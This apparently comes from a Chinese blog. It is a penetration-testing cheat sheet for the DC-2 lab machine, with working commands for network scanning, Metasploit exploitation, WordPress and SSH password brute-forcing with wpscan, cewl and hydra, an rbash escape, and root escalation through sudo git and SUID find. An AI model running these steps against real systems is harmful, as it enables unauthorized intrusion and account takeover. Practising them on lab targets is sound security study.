一、寻找活动主机:
1.比较快速的方法:arp-scan -l

  1. netdiscover
  2. nmap -sS 网络开始地址/24
    参数:-sS 是指SYN扫描

二、活动主机的信息收集

  1. nmap -A -p- hostIP
    参数:-A OS识别,版本探测,脚本扫描和traceroute综合扫描
    参数:-p- 扫描所有端口

三、漏洞利用
1.启动metasploit
msfconsole

2.搜索指定的exploit(主机中存在的漏洞)
search 主机中存在的漏洞名称

会已列表形式列出漏洞模块

  1. 指定上面列表中可用的模块
    use 模块编号
    4.查看需要配置项
    show options
    5.漏洞爆破
    exploit
    成功后,会出现:meterpreter>
    并进入到被攻击主机中。可以列出靶机的文件目录。
    6.如果是wordpress网站,可以使用wpscan扫描可以登录的用户
    wpscan --url dc-2 -e u
    -e:简单进行整体快速扫描
    u:枚举WordPress用户名
    -U:指定用户名字典
    -P:指定密码字典

wpscan工具爆破
wpscan --url dc-2 -U dc2users.txt -P dc2.txt
上面的密码字典可以通过以下方法生成:
cewl http://dc-2 -w dc2.txt

ssh登录密码爆破: 使用Hydra工具进行
hydra -L dc2users.txt -P dc2.txt 192.168.43.15 ssh -s 7744(ssh端口号)
-L:指定用户名字典
-P:指定密码字典
-s:可通过这个参数指定非默认端口
rbash绕过方法:
BASH_CMDS[a]=/bin/sh;a #调用/bin/sh命令解释器
/bin/bash #使用bash命令解释器
export PATH=$PATH:/bin/ #设置环境变量

git提权:

sudo git help config

!/bin/bash或者!'sh'完成提权

sudo git -p help

!/bin/bash

四、进入靶机shell
shell
查看python版本
python -V
通过pty.spawn()获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'

五、提升权限
提权专题介绍
1.使用find命令查找有特殊权限suid的命令
find / -perm -4000

例如find具有suid权限,则执行下面命令
find 任意文件 -exec '/bin/sh' \;
如果成功提权,则提示符从“>”变为“#”

2.使用git进行提权
sudo git help config
输入:GG
来到最后一行
输入以下代码进行提权:

!/bin/bash

如果成功提权,则提示符从“>”变为“#”

标签: none

评论已关闭